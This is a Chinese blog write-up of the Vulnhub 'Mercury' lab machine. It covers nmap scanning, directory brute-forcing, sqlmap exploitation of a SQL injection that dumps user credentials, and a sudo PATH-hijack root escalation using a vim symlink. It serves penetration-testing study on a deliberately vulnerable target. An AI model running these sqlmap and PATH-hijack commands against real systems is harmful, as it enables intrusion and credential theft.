Vulnhub Mercury

0x01:端口扫描

nmap -sn 10.10.10.0/24

image-20241206172300152

全端口扫描

nmap --min-rate 10000 -p- 10.10.10.129

image-20241206172416943

UDP扫描

nmap -sU --top=20 10.10.10.129

image-20241206172535600

详细端口扫描

nmap -sT -sC -sV -O --min-rate 10000 -p22,8080 10.10.10.129

image-20241206172839642

漏洞扫描

nmap --script=vuln -p22,8080 10.10.10.129

0x02:web渗透

image-20241206173054950

先扫目录

dirsearch -u http://10.10.10.129:8080
gobuster dir -u http://10.10.10.129:8080 -x php,zip,rar,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20241206173528165

image-20241206195713744

先查看/robots.txt

image-20241206173815538

没扫到啥有用的东西呢,我们在手动尝试一些其他的目录呢

image-20241206174038119

报错给了我们一个特别的目录/mercuryfacts,我们查看

image-20241206174212075

逐一搜索查看,See list有提示数据库为mysql

image-20241206174340893

Load a fact发现sql注入报错

image-20241206174423596

sqlmap -u "http://10.10.10.129:8080/mercuryfacts/1*/" --dbs

image-20241206174926585

sqlmap -u "http://10.10.10.129:8080/mercuryfacts/1*/" -D mercury -T users --dump

image-20241206175019733

拿到凭证

john@johnny1987
laura@lovemykids111
sam@lovemybeer111
webmaster@mercuryisthesizeof0.056Earths

尝试登录,最后成功以webmaster用户成功登录ssh

image-20241206175502406

0x03:权限提升

查看权限

sudo -l

image-20241206180700296

找到notes.txt,告诉了我们linuxmaster的密码,是base64

image-20241206180811731

image-20241206180950587

linuxmaster@mercurymeandiameteris4880km

成功横向移动

image-20241206181120186

查看权限

image-20241206181150493

image-20241206181213048

image-20241206193855047

可惜他没有写权限

我们可以通过劫持环境变量,将tail替换成vim,从而实现提权

我们先创建软链接

ln -s /usr/bin/vim tail

然后设置当前环境变量

export PATH=$(pwd):$PATH

image-20241206194823027

最后执行

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

--preserve-env=PATH:用于控制在执行命令时是否保留当前用户的环境变量,因为 sudo 命令会使用安全的默认 的PATH路径,所以我们要加上它

image-20241206195157981

image-20241206195227339

0x04:思考总结

1.靶机Django没关debug导致输入不存在目录出现隐藏目录

2.这台靶机也可以使用Pwnkit脚本提权

posted @ 2024-12-06 20:02  kelec0ka  阅读(3)  评论(0编辑  收藏  举报